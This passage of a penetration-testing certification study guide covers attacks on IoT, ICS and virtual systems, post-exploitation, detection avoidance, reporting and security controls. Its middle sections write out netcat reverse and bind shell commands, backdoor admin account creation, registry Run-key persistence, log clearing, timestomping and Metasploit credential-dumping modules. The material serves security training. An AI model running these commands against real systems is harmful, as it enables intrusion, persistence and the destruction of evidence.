o Postman
▪ An API platform for building and using APIs that simplifies each step of
the API lifecycle and streamlines collaboration

- 129 -

Attacks on Specialized Systems

● Attacks on Specialized Systems
o You may be expected to perform an assessment of an organization’s Operational
Technology network, in addition to their Information Technology network
o Domain 3: Attacks and Exploits
▪ Objective 3.5
● Explain common attacks and vulnerabilities against specialized
systems

● Internet of Things (IoT) Devices

o Internet of Things
▪ A group of objects that can be electronic or not, which are all connected
to the wider internet by using embedded electronic components
▪ IoT devices are not always secured

o IoT Protocols
▪ Wi-Fi
● Wi-Fi can be operated in either infrastructure mode or ad hoc
mode to create a local area network or a personal area network

▪ Bluetooth
● A short-range wireless networking technology that can be used by
IoT devices

▪ Radio Frequency ID (RFID)

● Used to interconnect badges and card keys to the network

▪ Near Field Communication (NFC)

● Enables two electronic devices to communicate when they come
within about 4 cm of each other

▪ Infrared
● Used for devices that need to communicate using a line of sight
communication using light beams inside of the infrared spectrum
● Infrared only covers a limited distance on a relatively low
bandwidth solution

- 130 -

▪ Zwave
● A short range, low latency data transfer technology that uses less
power and has lower data rates than Wi-Fi

▪ ANT+
● A technology used for the collection of sensor data from different
IoT devices

o IoT Communications
▪ Machine to Machine (M2M)
● Involves communication between the IoT device and some other
traditional system like a server or a gateway

▪ Machine to Person (M2P)

● Involves communication between an IoT device and the end user

● Internet of Things (IoT) Vulnerabilities

o The S in IoT stands for security (…but there is no S in IoT!)
o Most IOT devices use an embedded version of Linux or Android as their OS
o Many manufacturers use outdated or insecure hardware components

o Prevention
▪ Properly install, secure, and segment IOT devices into their own subnet,
VLAN, or network outside of the normal IT production network

o Common Vulnerabilities
▪ Insecure defaults
● Default login credentials
● No password set
● Number of open ports
● Unauthorized connection
● Firewall being turned off

▪ Hard-coded configurations
● Self-registering device
● Usernames and passwords in plain text
● Unchangeable settings

- 131 -

▪ Cleartext communication
● Sending data in plain text

▪ Data leakage

o Attackers also monitor Bluetooth frequencies being transmitted and conduct

eavesdropping
▪ Data modification
▪ Data exfiltration

o Be careful in which exploits you use since you can inadvertently cause the device
to go offline, crash, or malfunction

● Embedded Systems
o Embedded Systems
▪ A computer system that is designed to perform a specific, dedicated
function
▪ Embedded systems can be a simple device or fully complex with the use
of operating systems

o Programmable Logic Controller (PLC)

▪ A type of computer designed for deployment in an industrial or outdoor
setting that can automate and monitor mechanical systems
▪ PLC firmware can be patched and reprogrammed to fix vulnerabilities

o System-on-Chip (SoC)
▪ A processor that integrates the platform functionality of multiple logical
controllers onto a single chip
▪ System-on-Chip are power efficient and used with embedded systems

o Real-Time Operating System (RTOS)

▪ A type of OS that prioritizes deterministic execution of operations to
ensure consistent response for time-critical tasks
▪ Embedded systems typically cannot tolerate reboots or crashes and must
have response times that are predictable to within millisecond tolerances

- 132 -

o Field Programmable Gate Array (FPGA)

▪ A processor that can be programmed to perform a specific function by a
customer rather than at the time of manufacture
▪ End customer can configure the programming logic to run a specific
application instead of using an ASIC (application-specific integrated
circuit)

● ICS and SCADA Devices

o Operational Technology (OT)
▪ Designed to implement an industrial control system rather than business
and data networking systems
▪ Technology that interacts with the real world

o Industrial Control System (ICS)

● Provides the mechanisms for workflow and process automation
by using embedded devices
● Interconnected ICSs create a distributed control system (DCS)

o Fieldbus
▪ Links different programmable logic controllers together

o Programmable Logic Controller (PLC)

▪ Enables automation in assembly lines, autonomous field operations,
robotics, and other applications

o Human-Machine Interface (HMI)

▪ Input and output controls on a PLC that allow a user to configure and
monitor the system

o Ladder Logic
▪ Programming language entered into the system through the creation of a
graphical diagram used in the PLCs

o Data Historian
▪ Aggregates and catalogs data from multiple sources within an ICS by
collecting all the event generated from the control loop

- 133 -

o Supervisory Control and Data Acquisition (SCADA)

▪ A type of ICS that manages large-scale, multiple-site devices and
equipment spread over a geographic region from a host computer

▪ Gathers data from and manage plant devices and equipment with
embedded PLCs

● ICS Protocols and Vulnerabilities

o Controller Area Network (CAN)
▪ Designed to allow communications between embedded programmable
logic controllers
▪ CAN bus protocol operates like an ethernet network
▪ Does not have source addressing or message authentication

▪ Vulnerabilities
● OBD-II port
● Cellular modem
● Wi-Fi network

o Modbus
▪ Gives control servers and the SCADA host the ability to query and change
configurations of each PLC over a network
▪ Modbus looks and functions differently than TCP/IP does
- 134 -

▪ Originally known as Modbus RTU and was run over fieldbus networks

o Data Distribution Service (DDS)

▪ Provides network interoperability and facilitates the required scalability,
performance, and QoS features

o Safety Instrumented System (SIS)

▪ Returns an industrial process to a safe state after a predetermined
condition was detected
▪ Reduces the severity of an emergency by taking quick action

● Data Storage Vulnerabilities

o Direct Attach Storage
▪ Any kind of storage that is attached to a system

o Network Attach Storage

▪ Any group of file servers that are attached to the network dedicated to
provisioning data access

o Storage Area Network

▪ A separate subnetwork that is consisting of storage devices and servers
that are used to house a large amount of information

- 135 -

o Vulnerabilities
▪ Misconfigurations
● Improper access rights or permissions
● Use of default or blank usernames and passwords
● Network exposure

▪ Underlying Software Vulnerabilities

▪ Improper Error Messages and Debug Handling

▪ Injection Vulnerability
● Command Line Injection
● DLL Injection
● SQL Injections

▪ Lack of User Input Sanitization

o Management Interface Vulnerabilities

▪ Intelligent Platform Management Interfaces (IPMI)
● A system that allows administrators to easily monitor and control
all their servers from essentially located interface

● Virtual Environments
o Virtualization
▪ A host computer installed with a hypervisor that can be used to install
and manage multiple guest OSs or VMs

- 136 -

o Hypervisor
▪ Manages the distribution of the physical resources of a server to the VMs
▪ Ensure that each VM runs its own OS copy

o Virtual Desktop Infrastructure (VDI)

▪ Hosts desktop OSs within a virtualized environment hosted by a
centralized server or server farm
▪ The server is going to perform all the application processing and data
storage

▪ Centralized Model
● Hosts all the desktop instances on a single server or server farm

▪ Hosted Model/Desktop as a Service (DAAS)

● Maintained by a service provider and provided to the end user as
a service

▪ Remote Virtual Desktop Model

● Copies the desktop image to a local machine prior to being used
by the end user

o Terminal Services
▪ A server-based solution that runs the application on servers in a
centralized location

o Application Streaming
▪ A client-based solution that allows an application to be packaged up and
streamed directly to a user’s PC

● Virtual Machine Attacks

o VM Escape
▪ Occurs when a threat actor attempts to get out of an isolated VM and
directly sends commands to the underlying hypervisor
▪ Easier to perform on a Type II hypervisor than a Type I hypervisor
▪ Ensure guest OS, host OS, and hypervisor are patched and up to date
▪ VM to hypervisor or host OS

- 137 -

o VM Hopping
▪ Occurs when a threat actor attempts to move from one VM to another
on the same host
▪ VM to VM
▪ Ensure guest OS and hypervisor are patched, up-to-date, and securely
configured

o Sandbox
▪ Separates running programs to mitigate system failures or software
vulnerabilities from spreading

o Sandbox Escape
▪ Occurs when an attacker circumvents sandbox protections to gain access
to the protected OS or other privileged processes

o Live Migration
▪ Migration of a VM from one host to another even while it is running
▪ VM images should be encrypted prior to being sent from one server to
another over the network

o Data Remnants
▪ Leftover pieces of data that may exist in the hard drive which are no
longer needed
▪ Always encrypt VM storage locations and ensure encryption key is
destroyed

o VM Sprawl
▪ Refers to creating Virtual Machine without proper change control
procedures

o VM Repositories
▪ A place where all VM images and templates are being stored
▪ Always make sure that the templates and images are digitally signed

- 138 -

● Containerization
o Containerization
▪ A type of virtualization applied by a host OS to provision an isolated
execution environment for an application
● Docker
● Parallels Virtuozzo
● OpenVZ

o Vulnerabilities
▪ When an organization crashes a physical server, all of the organizations
hosted on that same server are affected

▪ An organization failing to secure its virtual environments hosted on a

shared server poses a security risk for the other organizations hosting on
that same server
● Set up virtual servers in the cloud with proper failover,
redundancy, and elasticity

▪ Hosting all VMs on the same type of hypervisor can also be exploited
● The hypervisor should remain patched and up to date

- 139 -

Post-Exploitation Exploits
● Post-Exploitation
o Post-Exploitation Actions
▪ Any actions taken after a successful initial attack or exploit
● Host enumeration
● Network enumeration
● Infrastructure enumeration
● Additional permissions
● Persistence
● Covert channels

o Domain 3: Attacks and Exploits

▪ Objective 3.7
● Given a scenario, perform post-exploitation techniques

● Enumerating the Network

o Enumeration Targets
▪ Users
▪ Groups
▪ Hosts
▪ Forests
▪ Sensitive data
▪ Unencrypted files

o Enumeration
▪ The process to identify and scan network ranges and host from a target
network and map out an attack surface

o Active Directory
▪ A central directory service that allows our information to be stored,
classified, and retrieved easily

o Get-NetDomain
▪ Get the current user’s domain

o Get-NetLoggedon
▪ Get users that are logged on a given computer
- 140 -

o cat/etc/passwd
▪ List all users on the system

o uname-a
▪ Displays the OS name, version, and other details

o env
▪ Outputs a list of all the environmental variables

o Finding Sensitive Data

▪ Set up a network Sniffer on a victimized host
▪ Use the interpreter payload and turn on the packet capturing function
▪ Start figuring out what things are on the share drive that is unencrypted

● Network Segmentation Testing

o Network Segment
▪ A portion of a network where all attached hosts can communicate freely
with each other
● Subnets
● VLANs
● Firewalls

o Validate less secure networks cannot communicate with higher-security

networks

o Also check for any working applications between the two network segments

● Lateral Movement and Pivoting

o Lateral Movement
▪ A technique to progressively move through a network to search for the
key data and assets that are ultimately the target of an attack campaign

- 141 -

o Pivoting
▪ The use of one infected computer to attack a different computer
▪ Pivoting uses the compromised system to attack other systems on the
same network to avoid restrictions such as firewall configurations

o Pivoting and lateral movement are similar but distinct concepts in this section of
the course

● Pass the Hash

o Pass the Hash
▪ A network-based attack where the attacker steals hashed user
credentials and uses them as-is to try to authenticate to the same
network the hashed credentials originated on

▪ It is possible to present the hash without cracking the original password

to authenticate to network protocols such as SMB and Kerberos

- 142 -

▪ Pass the hash can be used to elevate privileges

▪ When pass the hash is used on a local workstation, then an attacker can
gain local admin privileges

o Mimikatz
▪ An open-source application that allows users to view and save
authentication credentials in order to perform pass the hash attacks

▪ Mimikatz scans system memory for cached passwords processed

by the Local Security Authority Subsystem Service (lsass.exe)

● post/linux/gather/hashdump
● post/pro/multi/gather/hashdump
● post/windows/gather/credentials/ domain_hashdump
● post/windows/gather/credentials/mssql_local_hashdump
● post/windows/gather/credentials/skype
● post/windows/gather/credentials/avira_password
● post/windows/gather/credentials/mcafee_vse_hashdump

o Test the usability and pass or crack them using a password attack
▪ Metasploit module
● exploit/windows/smb/psexec
● auxilary/scanner/smb/smb_login
- 143 -

▪ Hydra
▪ Medusa

o Passing the hash does NOT work in all cases

o Warning
▪ Domain administrative accounts should ONLY be used to logon to domain
controllers to prevent pass the hash from exploiting your domain

o How can you detect and mitigate against a pass the hash attack?
▪ Detecting these types of attacks is very difficult because the attacker
activity cannot be easily differentiated from legitimate authentication
▪ Most antivirus and antimalware software will block tools that allow pass
the hash attack, such as Mimikatz or the Metasploit framework
▪ Restrict and protect high privileged domain accounts
▪ Restrict and protect local accounts with administrative privileges
▪ Restrict inbound traffic using the Windows Firewall to all workstations
except for helpdesk, security compliance scanners, and servers

● Golden Ticket
o While a pass the hash attack will work on local workstations, a Kerberos ticket is
needed in an Active Directory environment

o Golden Ticket
▪ A Kerberos ticket that can grant other tickets in an Active Directory
environment
▪ Golden tickets can grant administrative access to other domains
members and domain controllers

o krbtgt hash
▪ The trust anchor of the Active Directory domain which functions like a
private key of a root certificate authority and generates ticket-granting
tickets (TGT) that are used by users to access services within Kerberos

- 144 -

▪ Golden tickets allow attackers to laterally move across the entire domain
with ease

▪ Administrators should change the krbtgt account password regularly

● Change the krbtgt account password twice in a short period of
time to invalidate the golden ticket if a breach is suspected

- 145 -

● Lateral Movement
o Attackers can use remote access protocols to move from host to host

o Remote Access Services

▪ Any combination of hardware and software to enable the remote access
tools or information that typically reside on a network of IT devices
▪ SSH, telnet, RDP, and VNC provide attackers the ability to laterally move
across the network

o Windows Management Instrumentation Command-Line (WMIC)

▪ Provides users with a terminal interface and enables administrators to
run scripts to manage those computers
▪ WMIC can be used a vector in post-attack lateral movement

o PsExec
▪ A tool developed as an alternative to Telnet and other remote access
services which utilizes the Windows SYSTEM account for privilege
escalation

o Windows PowerShell
▪ A task automation and configuration management framework from
Microsoft, consisting of a command-line shell and the associated scripting
language
▪ The PowerShell Empire toolkit contains numerous prebuilt attack
modules

▪ Attackers can also use graphical user environments

● Windows
o RDP
● MacOS
o Apple remote desktop
● Unix or Linux
o X window system

o Virtual Network Computing

▪ Allows you to connect using a graphical user interface to any operating
system

- 146 -

o RPC Decom
▪ A remote procedure call distributed component object model

▪ RPC
● An inter-process communication between local and remote
processes on Windows systems

▪ Decom
● Enables the communication between different software
components over a network

● Escalating Privileges
o Privilege Escalation
▪ The practice of exploiting flaws in an operating system or other
application to gain a greater level of access than what is intended for the
user application

● Horizontal Privilege Escalation

o Focused on obtaining access to a regular user account to a
different privilege level than the one currently in use

● Vertical Privilege Escalation

o Attackers try to obtain access to an account of higher
privileges than the one they currently have access to

- 147 -

▪ SUID
● Set-User Identification

▪ SGID
● Set-Group Identification
● sudo find / -perm -04000

o Sticky Bit
▪ Allows users to create files, read, and execute files owned by other user

▪ enum4linux
▪ auxiliary/scanner/smb/smb_enumshares

o SUDO
▪ Allows users to run programs with the privileges of another user

o Ret2libc
▪ An attack technique that relies on overwriting the program stack to
create a new stack frame that calls the system function

- 148 -

▪ ps –x
▪ ps -fU root

o CronJobs
▪ Scheduled tasks for Unix

o Cpassword
▪ The name of the attribute that stores the passwords in a Group Policy
preference item

o If SSL is not enabled for LDAP, credentials are sent over the network in clear text

o A CSV file will show which accounts are vulnerable

- 149 -

o Kerberoasting
▪ Allows any domain user account that has a service principal name (SPN)
set can have a service ticket (TGS)

o LSASS
▪ Local Security Authority Subsystem Service

o Credentials in LSASS
▪ The process in Windows that enforces the security policy of the system

o SAM Database
▪ A database file that stores the user passwords in Windows as a LM hash
or NTLM hash

▪ Passwords can be cracked offline if the SAM file is stolen

o Dynamic Link Library (DLL)

▪ Provides a method for sharing code and allows a program to upgrade its
functionality without requiring re-linking or re-compiling of the
application

o Hijacking
▪ A technique used to load a malicious DLL in the place of an accepted DLL

o Exploitable Services
▪ Attacker uses the way services normally operate to cause an unintended
program to run

▪ Normal
● C:\Dion\My Files\server.exe
▪ Malicious
● C:\Dion\My\server.exe

▪ Using PSExec, a service can be replaced with a custom service that runs a
command shell (cmd.exe)

- 150 -

o Unsecure File and Folder Permissions

▪ Older versions of Windows allow administrators to access any non admin
user’s files and folder

o Keylogger
▪ Surveillance technology used to monitor and record the keystrokes of a
victim user

o Kernel Exploits
▪ Unpatched Windows and Linux systems are vulnerable to many different
exploits
▪ Metasploit has a library of existing exploits

▪ You can attempt to bypass user local UAC (User Access Control)
● Guest accounts should be disabled

o Default Account Settings

▪ Default administrator accounts can be exploited

● Upgrading Restrictive Shells

o Restrictive Shell
▪ A shell where you might be confined from being able to do certain
functions
● python -c ‘import pty; pty.spawn(“/bin/bash”)’
● perl -e ‘exec /bin/sh”;’

o VI
▪ A text editor that can also run commands
▪ :set shell=/bin/sh
:shell
▪ The same type of restricted environments doesn’t exist in Windows
systems
▪ /bin/bash -i

o Meterpreter Script
▪ An interactive shell you can use instead of relying on the command
prompt, PowerShell, or a bash shell

- 151 -

Detection Avoidance
● Detection Avoidance
o Domain 3: Attacks and Exploits
▪ Objective 3.7
● Given a scenario, perform post-exploitation techniques

● Trojans and Backdoors

o Trojan
▪ Any malicious computer program that is used to mislead a user about its
true intent
▪ When the victim launched the game, it would actually call back to the
system and remotely access the system

o Backdoor
▪ A hidden mechanism that provides you with access to a system through
some kind of alternative means

o Remote Access Trojan (RAT)

▪ A type of malware that comes along with a legitimate software
● Back Orifice
● Blackshades
● DarkComet
● Sub7
● NetBus
● Pupy

o Rootkit
▪ Any kind of technology that is used to infect the system at a very low-
level using root access

● Creating Persistence
o Persistence
▪ A method that you use to maintain access to a victim machine or a
network for an extended period of time

- 152 -

▪ net user /add [username] [password]

● net user /add hacked Hacked123

▪ net localgroup administrators [username] /add

● net localgroup administrators hacked /add

▪ user# su –
▪ user# useradd hacked
user# passwd hacked

New password: Hacked123

Retype new password: Hacked123

▪ /etc/passwd

o Crontab
▪ Used by system administrators to do tasks at routine intervals inside
Linux

▪ * * * * * /path/to/command
● 45 23 * * 6 /home/user/scripts/exportdump.sh

o Task Scheduler
▪ Works like crontabs but it is used for Windows
▪ schtasks create
● schtasks /create /sc <scheduletype> /tn <taskname> /tr <taskrun>

- 153 -

o schtasks /create /sc hourly /mo 12 /tn hacked /tr

c:\myapp.exe
▪ schtasks delete
▪ schtasks run
▪ schtasks change
▪ schtasks end
▪ schtasks query

o Services and Daemons

▪ A background process that exists to handle periodic service requests that
the computer system expects to receive

▪ Daemons and services are not always malicious

● HTTPD
o Http Daemon
● SSHD
o Secure Shell Daemon

▪ You can add keys using the GUI regedit or command line version
● reg add HKLM\Softyware\Microsoft\Windows
\CurrentVersion\Run /v malware /d c:\malware.exe

▪ /etc/init.d
▪ /etc/system

o Bind Shell
▪ Binds the target system to a local network port

- 154 -

o Reverse Shell
▪ Sets up the listener on attack machine and make the target machine
make the call out over a port

▪ nc -lp 443 -e /bin/sh

nc -lp 443 -e cmd.exe

nc <IP> 443

▪ nc -lp 443

nc <IP> 443 -e /bin/sh

nc <IP> 443 -e cmd.exe

● Living Off the Land

o Exploit Technique
▪ Describes the specific method by which malware code infects a target
host
▪ Most modern malware uses fileless techniques to avoid detection by
signature-based security software

- 155 -

o Dropper
▪ Malware that is designed to install or run other types of malware
embedded in a payload on an infected host

o Downloader
▪ A piece of code that connects to the Internet to retrieve additional tools
after the initial infection by a dropper

o Shellcode
▪ Any lightweight code designed to run an exploit on the target, which may
include any type of code format from scripting languages to binary code
▪ Shellcode originally referred to malware code that would give the
attacker a shell (command prompt) on the target system

o Code Injection
▪ Exploit technique that runs malicious code with the identification number
of a legitimate process

o Masquerading
▪ Occurs when the dropper replaces a genuine executable with a malicious
one

o DLL Injection
▪ Occurs when the dropper forces a process to load as part of a DLL

o DLL Sideloading
▪ Occurs when the dropper exploits a vulnerability in a legitimate
program’s manifest to load a malicious DLL at runtime

o Process Hollowing
▪ Occurs when the dropper starts to process in a suspended state and
rewrites the memory locations containing the process code with the
malware code

o Droppers are likely to implement anti-forensics techniques to prevent detection

and analysis

- 156 -

o Living Off the Land

▪ Exploit technique that uses standard system tools and packages to
perform intrusions

▪ Detection of an adversary is more difficult when they are executing

malware code within standard tools and processes

▪ Tools
● PsExec
o Uses the server message block suite to issue commands to
remote systems without the need to install client software
o psexec \\<IP> -s <command path>

● Windows Management Instrumentation (WMI)

o Provides an interface for local and remote computer
management

● PowerShell Remoting
o A command shell and scripting language built on the .NET
framework

● Windows Remote Management (WinRM)

o Allows for the configuration of machines to access them
using the command-line environment or through
PowerShell

● Visual Basic Scripts (VBScripts)

o A command shell and scripting language built on the .NET
framework that allows admins and developers to manage
computers and add features to different toolsets

● Data Exfiltration
o Data Exfiltration
▪ The process by which an attacker takes data that is stored inside of a
private network and moves it to an external network
▪ Data exfiltration can be performed over many different channel types

- 157 -

o HTTP or HTTPS Transfers

▪ An attacker uses commercial file sharing services to upload the exfiltrated
data from a victim

o HTTP Requests to Database Services

▪ An adversary may use SQL injection or similar techniques to copy records
from the database to which they should not have access

▪ IoC
● Spikes in requests to a PHP files or other scripts, and unusually
large HTTP response packets

o DNS
▪ Use of DNS queries to transmit data out of a network enclave

▪ IoC
● Atypical query types being used, such as TXT, MX, CNAME, and
NULL

o Overt Channels
▪ Use of FTP, instant messaging, peer-to-peer, email, and other obvious file
and data sharing tools

o Explicit Tunnels
▪ Use of SSH or VPNs to create a tunnel to transmit the data across a given
network

▪ IoC
● Atypical endpoints involved in tunnels due to their geographic
location

o Warning
▪ An adversary could use a different channel for data exfiltration than for
command and control

o Best Mitigation
▪ Strong encryption of data at rest and data in transit

- 158 -

● Covert Channels
o Covert Channels
▪ Communication path that allows data to be sent outside of the network
without alerting any intrusion detection or data loss countermeasures

▪ Covert channels enable the stealthy transmission of data from node to

node using means that your security controls do not anticipate

● Transmit data over nonstandard port

● Encoding data in TCP/IP packet headers
● Segmenting data into multiple packets
● Obfuscating data using hex
● Transmitting encrypted data

▪ Prevention
● Advanced intrusion detection and user behavior analytics tools
are your best option to detect covert channels, but they will not
detect everything

o Methods
▪ Covert Storage Channel
● Utilizes one process to write to a storage location and another
process to read from that location

▪ Covert Timing Channel

● Utilizes one process to alter a system resource so that changes in
its response time can signal information to a recipient process

▪ Some covert channels are a hybrid of storage and timing channels

● Covering Your Tracks

o Methods
▪ Erase, modify, or disable evidence
▪ Clear log files
▪ Delete installed malware
▪ Hide files and folders

- 159 -

o Linux, Unix, or OS X
▪ Create a folder beginning with a dot (.) to hide files in

o Windows
▪ System32 folder
▪ Users folder
▪ Hidden attributes
▪ Alternate data streams
● C:\ type notepad.exe > calc.exe:notepad.exe
C:\ start calc.exe:notepad.exe

o Files can also be hidden in the slack space

o Logs
▪ Windows
● System logs
● Application logs
● Security logs
● Event logs

▪ Linux
● Usually stored in /var/logs

▪ Penetration testers do not usually modify or delete any of the logs

● clearev
● wevtutil cl Application
● echo “ ” > /var/log/syslog

o Stream Editor (SED)

▪ Has the ability to search, find, delete, replace, insert, or edit anything
inside of a file without the need to open that file
▪ sed -i ‘malware’ /var/log/auth.log
● Use timestomp
● Change the files’ ownership

o Timestomping
▪ Changes the access time of a file to a time that you want as the attacker

- 160 -

▪ touch
● Updates time to the current time

▪ ctime
● Changes the time to a given date/time

▪ Meterpreter has a built-in timestomp tool

● timestamp log.txt -m “02/03/2022 10:11:12”

▪ Bash (prevent saving history)

● export HISTSIZE=0
▪ Bash (erase history)
● echo “ ” > ~.bash_history
history -c

▪ Windows
● ALT+F7

▪ PowerShell
● Clear-History

▪ shred -zu <filename>

▪ format s: /fs:NTFS /p:1

● Post-Exploitation Tools

o Empire
▪ A C2 framework that uses PowerShell for common post-exploitation tasks
▪ github.com/bc-security/empire
▪ Nowadays, most Empire tools and techniques can be detected by
antivirus tools
- 161 -

▪ Empire is a collection of PowerShell exploits that can be used during post-

exploitation

o Mimikatz
▪ An open-source tool that is focused on exploiting Microsoft’s Kerberos
protocols

o BloodHound
▪ A tool used to explore Active Directory trust relationships and abuse
rights on AD objects

o Other Tools
▪ PowerShell
▪ VBScript
▪ Python
▪ Bash
▪ Perl
▪ Other

- 162 -

Communication and Reports

● Communication and Reports
o Domain 4: Reporting and Communication
▪ Objective 4.3
● Explain the importance of communication during the penetration
testing process
▪ Objective 4.1
● Compare and contrast important components of written reports

● Communication Paths
o Primary Contact
▪ The party responsible for handling the project for the target organization
● CISO
● CIO
● IT Director
● SOC Director

▪ Some organizations also provide a secondary contact to answer questions

and make decisions on behalf of the primary contact

▪ The primary and secondary contacts tend to be less technical and more
focused on the business impact, governance, and oversight during an
engagement

o Technical Contact
▪ The party responsible for handling the technology elements of the
engagement from the target organization’s perspective

o Emergency Contact
▪ The party responsible for urgent matters that occur outside of normal
business hours

- 163 -

● Communication Triggers
o Status Report
▪ Used to provide regular progress updates to the primary, secondary, and
technical contacts during an engagement
● End of day emails
o Recent tasks
o Current plans
o Blockers
● Gate checks

o Critical Findings
▪ Occur when a vulnerability is found that could pose a significant risk to
the organization

o Indicator of Compromise (IoC)

▪ A residual sign that an asset or network has been successfully attacked or
is being attacked
▪ If there are IoCs in the target network, pause the engagement and shift
to an incident response or recovery mode

● Reasons for Communication

o Situation Awareness
▪ The perception of the different environment elements and events with
respect to time or space, the comprehension of their meaning, and the
projection of their future status

▪ Members need to communicate and share information to create a shared

situational awareness amongst the team

o De-confliction
▪ Used to determine if a detected activity is a real attacker acting against
the target network or an authorized penetration tester

o De-escalation
▪ The process of decreasing the severity, intensity, or magnitude of a
reported security alert

- 164 -

o False positives
▪ Use a results validation process with the trusted agent to help identify
what findings may be false positives

o Criminal activity
▪ In case of criminal activity, consult with your lawyer or legal counsel to
determine the appropriate next steps

o Goal reprioritization
▪ Realize that penetration tests are a fluid thing and priorities do change
during the engagement

● Presentation of Findings
o C Suite
▪ Refers to the top-level management inside of an organization
● How vulnerable is their organization?
● What can they do to stop those vulnerabilities?
● How much money is it going to take?
● How many people is it going to take?
● How much time is it going to take?

▪ You need to put the cost associated with your findings

▪ You need to present them with the benefits
▪ Keep things at a broad, high level that is focused on the business and the
cost

o Third Party Stakeholders

▪ People that are not directly involved with the organization or client, but
still involved in the process related to the different penetration testing

▪ Risk Management
● Finds ways to minimize the likelihood of a certain outcome from
occurring and to achieve the desired outcomes

▪ Meet their requirements that are focused on regulatory compliance and

ensure that the organization has a proper cybersecurity baseline

- 165 -

o Technical Staff
▪ They’re going to be looking for details and ways that they can change
things using different operations software or security patches

o Developers
▪ They're looking for deeply technical information so they can change the
code that's runs those applications and prevent vulnerabilities from
happening

● Report Data Gathering

o Data Sources
▪ Open-source intelligence
▪ Reconnaissance
▪ Enumeration
▪ Vulnerability scanners
▪ Attack and exploit tools

o Use proper note-taking techniques to keep track of new discovery details

▪ Transcribed notes
▪ Screenshots
▪ File captures
o Notes can be used to create ongoing documentation during an engagement

o Normalization
▪ The process of combining data from various sources into a common
format and repository

o Dradis
▪ A framework used to gather and share data and findings amongst the
penetration testing team

o Ensure notes, reports, and findings are securely stored

- 166 -

● Written Reports
o Executive Summary
▪ A high-level overview written for the management and executives
▪ The executive summary must have a conclusion statement

o Scope Details
▪ Reiterates the agreed-upon scope during the engagement

o Methodology
▪ A high-level description of the standards or frameworks followed during
the penetration test
▪ The methodology section also includes a brief attack narrative

o Findings
▪ A full or summarized list of issues found during an engagement
▪ The findings section will most likely cover the bulk of the report
● Findings
● Recommendation
● Threat level
● Risk rating
● Exploitation

▪ Risk Appetite
● The amount of risk an organization is willing to accept

- 167 -

● Risk rating
● Risk prioritization
● Business impact analysis

o Metrics and Measures

▪ Metric
● A quantifiable measurement that helps to illustrate the
status or results of a process
● What’s the amount

▪ Measure
● A specific data point that contributes to a given metric
● What to measure

o Remediation
▪ Summarizes the biggest priorities the organization should focus on to
remediate vulnerabilities
▪ This allows the organization to make educated decisions based on your
recommendations

o Conclusion
▪ Summarizes the report as a whole

o Appendix
▪ Acts as the “catch-all” section to put all other details in
● Supporting evidence
● Attestation of findings
- 168 -

● Common Themes

o Identify vulnerability
o Outline best practices
o Share observations

● Securing and Storing Reports

o Store reports in an offline server or in an encrypted format

o Ensure the reports are only to be seen by those with a “need to know”
▪ Proper access control
▪ Secure encryption

o Maintain an audit trail to track the copies made of the report

o Make sure to know the lifecycle of all documents and evidence

▪ A period of 12 to 24 months should be enough, in most cases

- 169 -

Findings and Remediations

● Findings and Remediations
o Domain 4: Reporting and Communication
▪ Objective 4.2
● Given a scenario, analyze the findings and recommend the
appropriate remediation within a report

● Security Control Categories

o Security Control
▪ A technology or procedure put in place to mitigate vulnerabilities and risk
in order to ensure the confidentiality, integrity, availability, and
nonrepudiation of data and information

▪ Security controls should be selected and deployed in a structured manner

using an overall framework

o NIST SP 800-53
▪ Access Control (AC)
▪ Accountability (AA)
▪ Incident Response (IR)
▪ Risk Assessment (RA)

▪ Classes of Controls (old NIST SP 800-53)

● Technical (Logical) Controls
o A category of security control that is implemented as a
system (hardware, software, or firmware)

● Operational Controls
o A category of security control that is implemented
primarily by people rather than systems

● Administrative Controls
o A category of security control that provides oversight of
the information system

- 170 -

▪ Classes of Controls (NIST SP 800-53 Rev. 4 and newer)

● Preventative Control
o A control that acts to eliminate or reduce the likelihood
that an attack can succeed

● Detective Control
o A control that may not prevent or deter access, but will
identify and record any attempted or successful intrusion

● Corrective Control
o A control that acts to eliminate or reduce the impact of an
intrusion event

▪ No single security control is invulnerable, so the efficiency of a control is

instead measured by how long it delays an attack

o Other Security Controls

▪ Physical Control
● A type of security control that acts against in-person intrusion
attempts

▪ Deterrent Control
● A type of security control that discourages intrusion attempts

▪ Compensating Control
● A type of security control that acts as a substitute for a principal
control

● Selecting Security Controls

o Technical Controls
▪ Confidentiality
▪ Integrity
▪ Availability

▪ None of these three technologies can provide CIA alone, but combined
they uphold the three tenets of security

- 171 -

● Physical Controls
o Access Control Hardware
▪ Badge reader
▪ Biometric reader

o Access Control Vestibule (Mantrap)

▪ An area between two doorways that holds people until they are
identified and authenticated

o Smart Locker
▪ A fully integrated system that allows you to keep your laptop, tablet,
smartphone, or other valuables inside

o Locking Racks/Cabinets
▪ Controls physical access to networking equipment

o Employee Training
▪ 69% ROI for SMBs
▪ 248% ROI for large enterprises

o Video Surveillance
▪ Used to figure out what happened on a certain area

● Operational Controls

- 172 -

o Separation of Duties
▪ A preventative administrative control that should be considered
whenever we’re drafting authentication and authorization policies
for the organization

▪ High risk functions in our organization should utilize proper separation of

duties

▪ Split Knowledge
● When two people each have half of the knowledge for how to do
something

o Job Rotation
▪ Different users are trained to perform the tasks of the same position to
help prevent an identity fraud that could occur if only one employee
had that job

o Mandatory Vacation
▪ An employee is required to take a vacation at some point during the year
▪ Job rotation and mandatory vacations provide us the ability to cross train
our employees and develop trained personnel

o Employment and Termination Procedures

▪ An administrative control that is focused on what to do when hiring and
firing employees
● Security Awareness Training
o Used to reinforce users with the importance of their help
in securing the organization’s valuable resources
o Security awareness training should be developed based on
the intended audience

● Security Training
o Used to teach the organization’s personnel the skills that
they need to perform their job in a more secure manner
o Specialized training can be developed for the organization
based on the applicable laws, regulations, and business
model

- 173 -

● Security Education
o Used to gain more expertise and to better manage the
security programs in an organization

o Auditing Requirements and Frequency

▪ Any essential items to organizational security that should be discussed
in the security policy
▪ Know what you will audit and to what level

o Time of Day Restriction

▪ Limits user access during non-business hours

● Administrative Controls
o Role Based Access Control
▪ Allows an administrator to assign roles and permissions to access each
resource
▪ This works well for organizations with a high rate of employee turnover

o Minimum Password Requirements

▪ Password Policy
● Promotes strong passwords by imposing acceptable password
specifications

▪ Complexity
● Having different characters used, such as lowercase letters,
uppercase letters, numbers, and special characters
● Passwords should be between 8 and 64 ASCII characters long

▪ Password Aging
● Password aging policies should not be enforced
● Minimum Age
o Certain number of days before a user can reset their
password

▪ Password History
● Dictates the number of different passwords to be used before
using a previously used one

- 174 -

o Policies and Procedures

▪ Enables an organization to operate normally for minimizing cyber security
incident

